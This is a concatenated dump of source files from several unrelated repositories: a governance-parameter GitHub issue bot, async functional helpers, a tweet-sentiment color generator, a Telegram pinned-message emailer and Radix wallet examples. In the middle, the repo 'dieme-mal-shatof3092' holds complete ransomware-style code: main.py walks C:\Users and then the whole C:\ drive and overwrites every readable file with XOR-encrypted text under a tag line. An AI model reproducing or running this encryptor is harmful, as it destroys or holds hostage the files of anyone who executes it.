"hatchScenarioFunding": 1571.22357,
"stepList": [[5000, "wxDai"], [100000, "wxDai"], [3000, "TEC"]],
"zoomGraph": 0,
"strategy": ""
}
self.tao_voting = tao_voting if tao_voting is not None else {
"supportRequired": 40,
"minimumQuorum": 10,
"voteDuration": 7,
"delegatedVotingPeriod": 3,
"quietEndingPeriod": 2,
"quietEndingExtension": 1,
"executionDelay": 1,
"strategy": ""
}
self.conviction_voting = conviction_voting if conviction_voting is not None else {
"convictionGrowth": 2,
"minimumConviction": 0.01,
"votingPeriodDays": 7,
"spendingLimit": 0.2,
"strategy": ""
}
self.advanced_settings = advanced_settings
self.image_files = image_files
def format_output_issue(self):
token_lockup_model = TokenLockupModel(
opening_price=self.token_lockup.get("openingPrice", ""),
token_freeze_period=self.token_lockup.get("tokenFreeze", ""),
token_thaw_period=self.token_lockup.get("tokenThaw", ""),
)
token_lockup_output = token_lockup_model.get_data().get("output", "")
token_lockup_table = token_lockup_output.get("table", "")
commons_percentage = self.abc.get("commonsTribute", 0.05)
opening_price = self.abc.get("openingPrice", 3)
entry_tribute = self.abc.get("entryTribute", 0.05)
exit_tribute = self.abc.get("exitTribute", 0.05)
scenario_reserve_balance = self.abc.get("reserveBalance", 1571.22357)
steplist = self.abc.get("stepList", "")
zoom_graph = self.abc.get("zoomGraph", 0)
initial_buy = self.abc.get("initialBuy", 0)
ragequit_amount = self.abc.get("ragequitAmount", 100)
augmented_bonding_curve_model = BondingCurveHandler(
commons_percentage=commons_percentage,
ragequit_amount=ragequit_amount,
opening_price=opening_price,
entry_tribute=entry_tribute,
exit_tribute=exit_tribute,
scenario_reserve_balance=scenario_reserve_balance,
initial_buy=initial_buy,
steplist=steplist,
zoom_graph=zoom_graph)
augmented_bonding_curve_output = augmented_bonding_curve_model.get_data()
conviction_voting_model = ConvictionVotingModel(
conviction_growth=self.conviction_voting.get("convictionGrowth", ""),
minimum_conviction=self.conviction_voting.get("minimumConviction", ""),
voting_period_days=self.conviction_voting.get("votingPeriodDays", ""),
spending_limit=self.conviction_voting.get("spendingLimit", ""),
)
conviction_voting_output = conviction_voting_model.get_data().get("output", "")
conviction_voting_table = conviction_voting_output.get("table", "")
formated_abc_steps = ""
abc_step_table = augmented_bonding_curve_output["stepTable"]
for idx in range(len(abc_step_table['step'])):
if idx > 0:
formated_abc_steps += "| **Step {step}** | {current_price} | {amount_in} | {tribute_collected} | {amount_out} | {new_price} | {price_slippage} |\n".format(
step=abc_step_table["step"][idx],
current_price=abc_step_table["currentPriceParsed"][idx],
amount_in=abc_step_table["amountInParsed"][idx],
tribute_collected=abc_step_table["tributeCollectedParsed"][idx],
amount_out=abc_step_table["amountOutParsed"][idx],
new_price=abc_step_table["newPriceParsed"][idx],
price_slippage=abc_step_table["slippage"][idx]
)
formated_advanced_settings_data = advanced_settings_data.format(
issue_number=self.issue_number,
commons_pool_amount=self.advanced_settings.get("commonPoolAmount", ""),
hny_liquidity=self.advanced_settings.get("HNYLiquidity", ""),
garden_liquidity=self.advanced_settings.get("gardenLiquidity", ""),
virtual_supply=self.advanced_settings.get("virtualSupply", ""),
virtual_balance="{:,}".format(self.advanced_settings.get("virtualBalance", "")),
transferability=self.advanced_settings.get("transferability", ""),
token_name=self.advanced_settings.get("tokenName", ""),
token_symbol=self.advanced_settings.get("tokenSymbol", ""),
proposal_deposit=self.advanced_settings.get("proposalDeposit", ""),
challenge_deposit=self.advanced_settings.get("challengeDeposit", ""),
settlement_period=self.advanced_settings.get("settlementPeriod", ""),
minimum_effective_supply=100 * self.advanced_settings.get("minimumEffectiveSupply", ""),
hatchers_rage_quit=self.advanced_settings.get("ragequitAmount", ""),
initial_buy=self.advanced_settings.get("initialBuy", ""),
)
formated_output = issue_data.format(
issue_number=self.issue_number,
overall_strategy=self.overall_strategy,
token_lockup_strategy=self.token_lockup.get("strategy", ""),
token_freeze_period=self.token_lockup.get("tokenFreeze", ""),
token_thaw_period=self.token_lockup.get("tokenThaw", ""),
opening_price=self.token_lockup.get("openingPrice", ""),
tokens_released=["{0:.2f}".format(100 * item) for item in token_lockup_table["tokensReleased"]],
price_floor=["{0:.2f}".format(item) for item in token_lockup_table["price"]],
abc_strategy=self.abc.get("strategy", ""),
commons_tribute="{0:.2f}".format(100 * self.abc.get("commonsTribute", "")),
commons_tribute_remainder="{0:.2f}".format(100 - 100 * self.abc.get("commonsTribute", "")),
entry_tribute="{0:.2f}".format(100 * self.abc.get("entryTribute", "")),
exit_tribute="{0:.2f}".format(100 * self.abc.get("exitTribute", "")),
reserve_ratio="{0:.2f}".format(100 * augmented_bonding_curve_output["chartData"]["reserveRatio"]),
step=augmented_bonding_curve_output["stepTable"]["step"],
current_price=augmented_bonding_curve_output["stepTable"]["currentPriceParsed"],
amount_in=augmented_bonding_curve_output["stepTable"]["amountInParsed"],
tribute_collected=augmented_bonding_curve_output["stepTable"]["tributeCollectedParsed"],
amount_out=augmented_bonding_curve_output["stepTable"]["amountOutParsed"],
new_price=augmented_bonding_curve_output["stepTable"]["newPriceParsed"],
price_slippage=augmented_bonding_curve_output["stepTable"]["slippage"],
common_pool_before="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["commonPoolBefore"]),
reserve_balance_before="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["reserveBalanceBefore"]),
common_pool_after="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["commonPoolAfter"]),
reserve_balance_after="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["reserveBalanceAfter"]),
abc_steps=formated_abc_steps,
abc_reserve=augmented_bonding_curve_output["milestoneTable"].get("balance", ""),
abc_supply=augmented_bonding_curve_output["milestoneTable"].get("supply", ""),
abc_price=augmented_bonding_curve_output["milestoneTable"].get("price", ""),
tao_voting_strategy=self.tao_voting.get("strategy", ""),
support_required=self.tao_voting.get("supportRequired", ""),
minimum_quorum=self.tao_voting.get("minimumQuorum", ""),
double_conviction_growth_days=2*self.tao_voting.get("voteDuration", ""),
vote_duration_days=self.tao_voting.get("voteDuration", ""),
delegated_voting_days=self.tao_voting.get("delegatedVotingPeriod", ""),
quiet_ending_days=self.tao_voting.get("quietEndingPeriod", ""),
quiet_ending_extension_days=self.tao_voting.get("quietEndingExtension", ""),
execution_delay_days=self.tao_voting.get("executionDelay", ""),
vote_duration_days_1_extension=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("quietEndingExtension", ""),
vote_duration_days_2_extensions=self.tao_voting.get("voteDuration", "") + (2 * self.tao_voting.get("quietEndingExtension", "")),
review_duration_days=self.tao_voting.get("voteDuration", "") - self.tao_voting.get("delegatedVotingPeriod", ""),
review_duration_days_1_extension=self.tao_voting.get("voteDuration", "") - self.tao_voting.get("delegatedVotingPeriod", "") + self.tao_voting.get("quietEndingExtension", ""),
review_duration_days_2_extensions=self.tao_voting.get("voteDuration", "") - self.tao_voting.get("delegatedVotingPeriod", "") + (2 * self.tao_voting.get("quietEndingExtension", "")),
execute_proposal_duration_days=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("executionDelay", ""),
execute_proposal_duration_days_1_extension=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("executionDelay", "") + self.tao_voting.get("quietEndingExtension", ""),
execute_proposal_duration_days_2_extensions=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("executionDelay", "") + (2 * self.tao_voting.get("quietEndingExtension", "")),
conviction_voting_strategy=self.conviction_voting.get("strategy", ""),
conviction_growth_days=self.conviction_voting.get("convictionGrowth", ""),
minimum_conviction=100 * self.conviction_voting.get("minimumConviction", ""),
relative_spending_limit=100 * self.conviction_voting.get("spendingLimit", ""),
effective_supply=conviction_voting_table["totalEffectiveSupply"],
requested_amount=conviction_voting_table["requestedAmount"],
amount_common_pool=conviction_voting_table["amountInCommonPool"],
min_tokens_pass=conviction_voting_table["minTokensToPass"],
tokens_pass_2_weeks=conviction_voting_table["tokensToPassIn2Weeks"],
has_advanced_settings="Yes" if self.advanced_settings else "No",
advanced_settings_section=formated_advanced_settings_data if self.advanced_settings else "",
token_lockup_image=self.save_images_database(self.image_files['tokenLockup']),
abc_image=self.save_images_database(self.image_files['abc']),
tao_voting_image=self.save_images_database(self.image_files['taoVoting']),
conviction_voting_image=self.save_images_database(self.image_files['convictionVoting'])
)
return formated_output
def save_parameters_database(self, issue_number):
MONGODB_CLIENT = os.getenv("MONGODB_CLIENT")
client = MongoClient(MONGODB_CLIENT)
db = client.get_database("test_tec_params_db")
test_params_db = db.test_params
self.raw_body["issue_number"] = issue_number
issue_data = self.raw_body
test_params_db.insert_one(issue_data)
def save_images_database(self, image=None, default=None):
CLIENT_ID = os.getenv("CLIENT_ID")
API_KEY = os.getenv("API_KEY")
url = "https://api.imgur.com/3/upload.json"
headers = {"Authorization": CLIENT_ID}
r = requests.post(
url,
headers = headers,
data = {
'key': API_KEY,
'image': b64encode(image.read()),
'type': 'base64',
'name': image,
'title': 'Picture'
}
)
return r.json()['data'].get('link', '')
def generate_output(self):
PARAMS_BOT_AUTH_TOKEN = os.getenv("PARAMS_BOT_AUTH_TOKEN")
headers = {'Content-Type': 'application/json', 'Authorization': PARAMS_BOT_AUTH_TOKEN}
r_issue_data = requests.get('https://api.github.com/search/issues?q=repo:CommonsBuild/test-issues-config-dashboard')
self.issue_number = 1 + r_issue_data.json().get("total_count", 0)
data = {"title": self.title, "body": self.format_output_issue()}
r = requests.post('https://api.github.com/repos/CommonsBuild/test-issues-config-dashboard/issues', data=json.dumps(data), headers=headers)
if r.status_code == 201:
issue_number = r.json().get("number", "")
self.save_parameters_database(issue_number=issue_number)
return {"status": r.status_code, "url": r.json().get("html_url", "")}
``` |
{
"source": "0xnurl/gamla",
"score": 2
} |
#### File: gamla/gamla/data.py
```python
import dataclasses
import json
import dataclasses_json
def get_encode_config():
return dataclasses.field(
metadata=dataclasses_json.config(
encoder=lambda lst: sorted(lst, key=json.dumps, reverse=False)
)
)
```
#### File: gamla/gamla/functional_async.py
```python
import asyncio
import inspect
from typing import Any, AsyncGenerator, Awaitable, Callable, Dict, Iterable
import toolz
from toolz import curried
from gamla import functional
async def to_awaitable(value):
if inspect.isawaitable(value):
return await value
return value
async def apipe(val, *funcs):
for f in funcs:
val = await to_awaitable(f(val))
return val
def acompose(*funcs):
async def composed(*args, **kwargs):
for f in reversed(funcs):
args = [await to_awaitable(f(*args, **kwargs))]
kwargs = {}
return toolz.first(args)
return composed
def acompose_left(*funcs):
return acompose(*reversed(funcs))
def run_sync(f):
"""Runs a coroutine in a synchronous context, blocking until result arrives."""
loop = asyncio.new_event_loop()
return loop.run_until_complete(asyncio.ensure_future(f, loop=loop))
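# Illustrative usage (not part of the original module, shown here as a commented sketch):
# run_sync drives the async helpers in this file from synchronous code, for example together
# with apipe above and amap defined just below:
#
#     async def double(x):
#         return x * 2
#
#     run_sync(apipe(3, double, double))      # -> 12
#     run_sync(amap(double, [1, 2, 3]))       # -> [2, 4, 6]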
@toolz.curry
async def amap(f, it):
return await asyncio.gather(*map(f, it))
@toolz.curry
async def amap_ascompleted(
f: Callable[[Any], Awaitable[Any]], it: Iterable
) -> AsyncGenerator[Any, None]:
for future in asyncio.as_completed(map(f, it)):
yield await future
@toolz.curry
async def aexcepts(exception_type, func, handler, x):
try:
return await func(x)
except exception_type as error:
return handler(error)
@toolz.curry
async def mapa(f, it):
async for element in it:
yield f(element)
async def aconcat(async_generators):
async for g in async_generators:
for x in g:
yield x
def ajuxt(*funcs):
async def ajuxt_inner(x):
return await apipe(
funcs, amap(acompose_left(functional.apply(x), to_awaitable)), tuple
)
return ajuxt_inner
@toolz.curry
async def afilter(func, it):
it = tuple(it)
results = await amap(func, it)
return toolz.pipe(
zip(it, results), curried.filter(toolz.second), curried.map(toolz.first)
)
def afirst(*funcs, exception_type):
async def afirst_inner(x):
for f in funcs:
try:
return await to_awaitable(f(x))
except exception_type:
pass
raise exception_type
return afirst_inner
@toolz.curry
async def apair_with(f, element):
return await f(element), element
@toolz.curry
async def apair_right(f, element):
return element, await f(element)
@toolz.curry
async def akeymap(f, d: Dict):
return await aitemmap(ajuxt(acompose_left(toolz.first, f), toolz.second), d)
@toolz.curry
async def avalmap(f, d: Dict):
return await aitemmap(ajuxt(toolz.first, acompose_left(toolz.second, f)), d)
@toolz.curry
async def aitemmap(f, d: Dict):
return await apipe(d, dict.items, amap(f), dict)
@toolz.curry
def aternary(condition, f_true, f_false):
async def aternary_inner(*args, **kwargs):
return (
await to_awaitable(f_true(*args, **kwargs))
if await to_awaitable(condition(*args, **kwargs))
else await to_awaitable(f_false(*args, **kwargs))
)
return aternary_inner
``` |
{
"source": "0xnya/dieme-mal-shatof3092",
"score": 3
} |
#### File: 0xnya/dieme-mal-shatof3092/lockit.py
```python
from binascii import hexlify, unhexlify
class HEX:
def __init__(self, text: str, secret: str):
self.secret = secret
self.text = text
self.data = None
@staticmethod
def rawEncrypt(text: str, secret: str) -> "HEX":
byted_text = text.encode("utf-8")
byted_secret = secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
data = hex(encrypted_int).upper().replace("0X", "0x")
return data
@staticmethod
def rawDecrypt(data: str, secret: str) -> str:
byted_secret = secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(data[2:], 16)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
data = decrypted_text.decode("utf-8")
return data
def encrypt(self) -> "HEX":
byted_text = self.text.encode("utf-8")
byted_secret = self.secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
self.data = hex(encrypted_int).upper().replace("0X", "0x")
return self
def decrypt(self) -> "HEX":
byted_secret = self.secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(self.data[2:], 16)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
self.data = decrypted_text.decode("utf-8")
return self
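# Illustrative round trip (not part of the original module, shown as a commented sketch):
# the scheme XOR-encrypts the integer form of the text with the secret's integer form
# floor-divided by 0xC0FFEE, so the same secret reverses it. Hypothetical example:
#
#     token = HEX.rawEncrypt("hello", "my secret")   # -> "0x..." hex string
#     HEX.rawDecrypt(token, "my secret")             # -> "hello"
#
# The chained form behaves the same way: HEX("hello", "my secret").encrypt().data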
class ID:
def __init__(self, text: str, secret: str):
self.secret = secret
self.text = text
self.data = None
@staticmethod
def rawEncrypt(text: str, secret: str) -> str:
byted_text = text.encode("utf-8")
byted_secret = secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
data = encrypted_int
return data
@staticmethod
def rawDecrypt(data: str, secret: str) -> str:
byted_secret = secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(data)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
data = decrypted_text.decode("utf-8")
return data
def encrypt(self) -> "ID":
byted_text = self.text.encode("utf-8")
byted_secret = self.secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
self.data = encrypted_int
return self
def decrypt(self) -> "ID":
byted_secret = self.secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(self.data)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
self.data = decrypted_text.decode("utf-8")
return self
```
#### File: 0xnya/dieme-mal-shatof3092/main.py
```python
from os import walk
from lockit import HEX
from threading import Thread
import codecs
MODE = "DEATH" # DEATH/UNDO
KEY = "<KEY>" # encryption/decryption key
MESSAGE = "[ nyaanity ] " # at top of every encrypted file
class Dieme(Thread):
def __init__(self):
super().__init__()
self.step = 0
def run(self):
# top priority: important files
for obj in walk(f"C:\\Users"):
self.step += 1
path = obj[0]
if "desktop" in path.lower():
for file in obj[2]:
path = f"{obj[0]}\\{file}"
try:
with codecs.open(path, "r", "utf8") as f:
data = f.read()
if MODE == "DEATH":
with codecs.open(path, "w", "utf8") as f:
encrypted = (
HEX(
data,
KEY,
)
.encrypt()
.data
)
f.write(MESSAGE + encrypted)
if self.step % 1000 == 0:
print(f"\n\n({self.step}) {MODE} {path}\n\n")
elif MODE == "UNDO":
if MESSAGE in data:
with codecs.open(path, "w", "utf8") as f:
decrypted = (
HEX(
data.replace(MESSAGE, ""),
KEY,
)
.decrypt()
.data
)
f.write(decrypted)
print(f"\n\n({self.step}) {MODE} {path}\n\n")
except:
print(f"({self.step}) err no access to {file}")
# the rest
for obj in walk("C:\\"):
self.step += 1
for file in obj[2]:
path = f"{obj[0]}\\{file}"
try:
with codecs.open(path, "r", "utf8") as f:
data = f.read()
if MODE == "DEATH":
with codecs.open(path, "w", "utf8") as f:
encrypted = (
HEX(
data,
KEY,
)
.encrypt()
.data
)
f.write(MESSAGE + encrypted)
if self.step % 1000 == 0:
print(f"\n\n({self.step}) {MODE} {path}\n\n")
elif MODE == "UNDO":
if MESSAGE in data:
with codecs.open(path, "w", "utf8") as f:
decrypted = (
HEX(
data.replace(MESSAGE, ""),
KEY,
)
.decrypt()
.data
)
f.write(decrypted)
print(f"\n\n({self.step}) {MODE} {path}\n\n")
except:
print(f"({self.step}) err no access to {file}")
def main():
Dieme().start()
if __name__ == "__main__":
main()
``` |
{
"source": "0xOddrey/DroppingGemsNFT",
"score": 3
} |
#### File: DroppingGemsNFT/gems/openai_api.py
```python
import os
import openai
from decouple import config, Csv
from textblob import TextBlob
import tweepy
import text2emotion as te
from PIL import Image
import random
openai.api_key = config('OPENAI_API_KEY')
consumer_key = config('consumer_key')
consumer_secret = config('consumer_secret')
access_token = config('access_token')
access_token_secret = config('access_token_secret')
TWITTER_AUTH = tweepy.OAuthHandler(consumer_key, consumer_secret)
TWITTER_AUTH.set_access_token(access_token, access_token_secret)
api = tweepy.API(TWITTER_AUTH)
import nltk
nltk.download('omw-1.4')
from collections import Counter
def my_mode(sample):
c = Counter(sample)
results = [k for k, v in c.items() if v == c.most_common(1)[0][1]]
if len(results) == 0:
results = [100,0]
return(results)
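# A brief illustration (not in the original source) of what my_mode returns: it collects
# every value tied for the highest count, e.g.
#     my_mode([10, 20, 20, 30, 30])  ->  [20, 30]   (both appear twice)
#     my_mode([5, 5, 7])             ->  [5]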
def getSubjectivity(text):
result = TextBlob(text).sentiment.subjectivity
final = result * 100
return (round(final))
#Create a function to get the polarity
def getPolarity(text):
result = TextBlob(text).sentiment.polarity
final = result * 100 + 100
return (round(final))
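# Rough sketch of the scaling used above (the sentiment values are illustrative, not from
# the original code): TextBlob subjectivity lies in [0, 1] and polarity in [-1, 1], so
#     subjectivity 0.65 -> round(0.65 * 100)        = 65
#     polarity    -0.25 -> round(-0.25 * 100 + 100) = 75
# which getTopic below then uses as (x, y) pixel coordinates into colors_scheme.png.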
def getTweets(username):
tweets = api.user_timeline(screen_name=username, count=50)
# fetching the user
user = api.get_user(screen_name=username)
# fetching the ID
ID = user.id_str
tweet_list=[]
tweets_for_csv = [tweet.text for tweet in tweets]  # collect the tweet texts
for j in tweets_for_csv:
tweet_list.append(j)
return(tweet_list)
def getTopic(username):
filename = "gems/static/images/colors_scheme.png"
img = Image.open(filename)
if username != "_none_":
results = ["fee2e2", "ffedd5", "ecfccb", "dcfce7", "e0f2fe", "ede9fe", "fae8ff", "fce7f3", "c7d2fe"]
random.shuffle(results)
try:
tweets = getTweets(username)
except:
tweets = None
tweet_count = 0
ukraine = False
blackat = False
sxsw = False
if tweets:
for tweet in tweets:
if "@blackatxyz" in tweet.lower():
blackat = True
if "#sxsw" in tweet.lower():
sxsw = True
if "#standwithukraine️" in tweet.lower():
ukraine = True
if "RT @" not in tweet:
if tweet_count < 10:
subject = getSubjectivity(tweet)
polar = getPolarity(tweet)
if polar != 100 and subject != 0:
colors = img.getpixel((polar, subject))
colors = '{:02x}{:02x}{:02x}'.format(*colors)
tweet_count += 1
results.insert(0, colors)
if blackat:
results = ["4d4d4d", "3c3c3c", "000000", "4d4d4d", "111111", "1e1e1e", "111111", "000000", "3c3c3c", "111111"]
random.shuffle(results)
if sxsw:
results = ["C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9",]
random.shuffle(results)
if ukraine:
results = ["005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500"]
random.shuffle(results)
else:
results = ["cbd5e1", "94a3b8", "64748b", "e2e8f0", "cbd5e1", "94a3b8", "64748b", "e2e8f0", "94a3b8"]
return(results[:9])
def getFullTopic(username):
filename = "gems/static/images/colors_scheme.png"
img = Image.open(filename)
subject_mode = [0,0]
polar_mode = [0,0]
tweet_numbers = []
if username != "_none_":
results = ["fee2e2", "ffedd5", "ecfccb", "dcfce7", "e0f2fe", "ede9fe", "fae8ff", "fce7f3", "c7d2fe"]
random.shuffle(results)
try:
tweets = getTweets(username)
except:
tweets = None
tweet_count = 0
subject_total = []
polar_total = []
ukraine = False
blackat = False
sxsw = False
if tweets:
for tweet in tweets:
if "@blackatxyz" in tweet.lower():
blackat = True
if "#sxsw" in tweet.lower():
sxsw = True
if "#standwithukraine️" in tweet.lower():
ukraine = True
if "RT @" not in tweet:
if tweet_count < 10:
subject = getSubjectivity(tweet)
polar = getPolarity(tweet)
if polar != 100 and subject != 0:
subject_total.append(round(subject/10)*10)
polar_total.append(round(polar/10)*10)
colors = img.getpixel((polar, subject))
colors = '{:02x}{:02x}{:02x}'.format(*colors)
tweet_count += 1
results.insert(0, colors)
numer_totals = colors, subject, polar
tweet_numbers.append(numer_totals)
subject_mode = my_mode(subject_total)
polar_mode = my_mode(polar_total)
if blackat:
results = ["4d4d4d", "3c3c3c", "000000", "4d4d4d", "111111", "1e1e1e", "111111", "000000", "3c3c3c", "111111"]
random.shuffle(results)
if sxsw:
results = ["C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9", "1DE38C", "36C7AE", "C3FB5C", "6A7EF9",]
random.shuffle(results)
if ukraine:
results = ["005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500", "005BBB", "FFD500"]
random.shuffle(results)
else:
results = ["cbd5e1", "94a3b8", "64748b", "e2e8f0", "cbd5e1", "94a3b8", "64748b", "e2e8f0", "94a3b8"]
return(results[:9], tweet_numbers, subject_mode[0], polar_mode[0])
```
#### File: DroppingGemsNFT/gems/utils.py
```python
from .models import TwitterToken, twitterConnection
from requests import post, put, get
def get_user_tokens(session_id):
user_tokens=TwitterToken.objects.filter(session_id=session_id)
if user_tokens.exists():
return user_tokens[0]
else:
return None
def update_or_create_user_token(session_id, oauth_token, oauth_secret, user_id, user_name):
tokens = get_user_tokens(session_id)
if tokens:
tokens.oauth_token=oauth_token
tokens.oauth_secret=oauth_secret
tokens.user_id=user_id
tokens.user_name=user_name
try:
tokens.save(update_fields=['oauth_token',
'oauth_secret', 'user_id','user_name'], force_update=True)
except Exception as e:
print(e)
else:
tokens = TwitterToken(session_id=session_id, oauth_token=oauth_token,
oauth_secret=oauth_secret, user_id=user_id, user_name=user_name)
try:
tokens.save(force_insert=True)
except Exception as e:
print(e)
def is_twitter_authenticated(session_id):
tokens = get_user_tokens(session_id)
if tokens:
return True
else: return False
``` |
{
"source": "0xOddrey/TelegramEmail",
"score": 2
} |
#### File: TelegramEmail/telemail/tasks.py
```python
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
from base.celery import app
from django.views.generic import TemplateView
from django.core import mail
from datetime import datetime, timedelta
from django.template.loader import render_to_string
from django.utils.html import strip_tags
import _datetime
from datetime import datetime
from .models import *
from decouple import config, Csv
from celery import Celery
from django.conf import settings
from celery.schedules import crontab
from celery import shared_task
from datetime import datetime, timedelta
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from .models import *
from decouple import config, Csv
from django.template.loader import get_template
import requests
from base.celery import app
from telethon import TelegramClient
from telethon.tl.functions.channels import GetFullChannelRequest
from telethon import TelegramClient, events, sync
from telethon.errors import SessionPasswordNeededError
from telethon.tl.functions.messages import (GetHistoryRequest)
from telethon.tl.types import (
PeerChannel
)
import asyncio
import json
import logging
logging.basicConfig(level=logging.DEBUG)
from base.celery import app
# Setting configuration values
api_id = config("api_id")
api_hash = config("api_hash")
api_hash = str(api_hash)
phone = config("phone")
username = config("username")
SESSION = os.environ.get('TG_SESSION', 'quart')
@app.task
def runTelethon(arg):
print(arg)
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
client = TelegramClient(SESSION,api_id,api_hash, loop=loop).start()
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
me = client.sign_in(phone, input('Enter code: '))
channel_entity = client.get_entity(PeerChannel(int(config('PEER_CHANNEL'))))
offset_id = 0
limit = 20
all_messages = []
total_messages = 0
total_count_limit = 0
while True:
history = client(GetHistoryRequest(
peer=channel_entity,
offset_id=offset_id,
offset_date=None,
add_offset=0,
limit=limit,
max_id=0,
min_id=0,
hash=0
))
if not history.messages:
break
messages = history.messages
for message in messages:
if message.pinned:
result = message.to_dict()
t_messages = {"id":result["id"], "message":result["message"]}
all_messages.append(t_messages)
offset_id = messages[len(messages) - 1].id
total_messages = len(all_messages)
if total_count_limit != 0 and total_messages >= total_count_limit:
break
api_url = "http://telemail.herokuapp.com/add-message/"
requests.post(api_url, json=all_messages)
print(api_url)
client.disconnect()
@app.on_after_finalize.connect
def app_ready(**kwargs):
"""
Called once after app has been finalized.
"""
sender = kwargs.get('sender')
# periodic tasks
speed = 60
sender.add_periodic_task(speed, runTelethon.s('starting message pull'),name='update leases every {} seconds'.format(speed))
def send_pinned_email():
all_users = telegram_user.objects.all()
end_date = datetime.now()
start_date = end_date - timedelta(days=7)
allMessages = pinnedMessage.objects.filter(timestamp__range=[start_date, end_date], is_sent=False)
for user in all_users:
user_email = user.email
message = Mail(
from_email='<EMAIL>',
to_emails=user_email ,
subject='CPG Club',
html_content=get_template('summary_email.html').render({'allMessages': allMessages}))
try:
sg = SendGridAPIClient(config('SENDGRID_API_KEY'))
response = sg.send(message)
except Exception as e:
pass
``` |
{
"source": "0xOmarA/RadixLib",
"score": 3
} |
#### File: examples/10- connecting to a custom network/main.py
```python
from typing import Dict
import radixlib as radix
import os
def main() -> None:
# Defining the new custom network that we will be connecting to.
network: radix.network.Network = radix.network.Network(
name = "localnet",
account_hrp = "ddx",
resource_hrp_suffix = "_dr",
validator_hrp = "dv",
node_hrp = "dn",
default_gateway_url = "http://192.168.100.92:5308"
)
# Getting the mnemonic phrase for the wallet that we will be connecting to. In this case, my
# mnemonic phrase is stored in an environment variable under the name "MNEMONIC_PHRASE".
# You might want to do the same or you could also just put your mnemonic phrase as a literal
# string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Getting the balances for my wallet on this custom network
parsed_account_balances: Dict[str, Dict[str, int]] = wallet.get_account_balances()
print("Parsed account balances:", parsed_account_balances)
if __name__ == "__main__":
main()
```
#### File: examples/12- automated token sale/token sale.py
```python
from typing import Optional, Dict, List, Any
import radixlib as radix
import config
import json
def get_all_transactions(
wallet: radix.Wallet
) -> List[Dict[str, Any]]:
""" Gets all of the transactions where this wallet was involved. """
current_cursor: Optional[str] = None
transactions: List[Dict[str, Any]] = []
while 1:
next_cursor, new_transactions = wallet.get_account_transactions(30, current_cursor)
transactions.extend(new_transactions)
if next_cursor is not None:
current_cursor = next_cursor
else:
break
return sorted( # type: ignore
transactions,
key = lambda x: x['confirmed_time'],
reverse = False
)
def main() -> None:
# Loading up the data file which contains the state of the program from the last run
with open(config.data_json_file, 'r') as file:
data_file_content: Dict[str, Any] = json.load(file)
handled_transactions_mapping: Dict[str, str] = data_file_content['handled_transactions_mapping']
# Loading up our wallet through the information that we provided in the config file
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(config.network),
signer = radix.Signer.from_mnemonic(config.mnemonic_phrase)
)
print("Listening on transactions on wallet:", wallet.address)
# Getting all of the transactions that the wallet address was involved in
transactions: List[Dict[str, Any]] = get_all_transactions(wallet)
print(f"Number of transactions on address:", len(transactions))
# Deriving the token RRI for the token that we will will be selling
token_rri: str = radix.derive.token_rri(
creator_public_key = wallet.public_key,
token_symbol = config.token_symbol.lower(),
network = config.network
)
print("Sale is done on token:", token_rri)
# Getting our current balance of the token that we are selling
balance: int = wallet.get_account_balances()['total_balance'].get(token_rri, 0)
print("Current balance of token is:", balance)
# Iterating over all of the transaction objects from the oldest to the newest. This way, people
# who sent their XRD first get their tokens first.
for tx in transactions:
# Ignore the transaction if we have handled it already
if tx['hash'] in handled_transactions_mapping.keys():
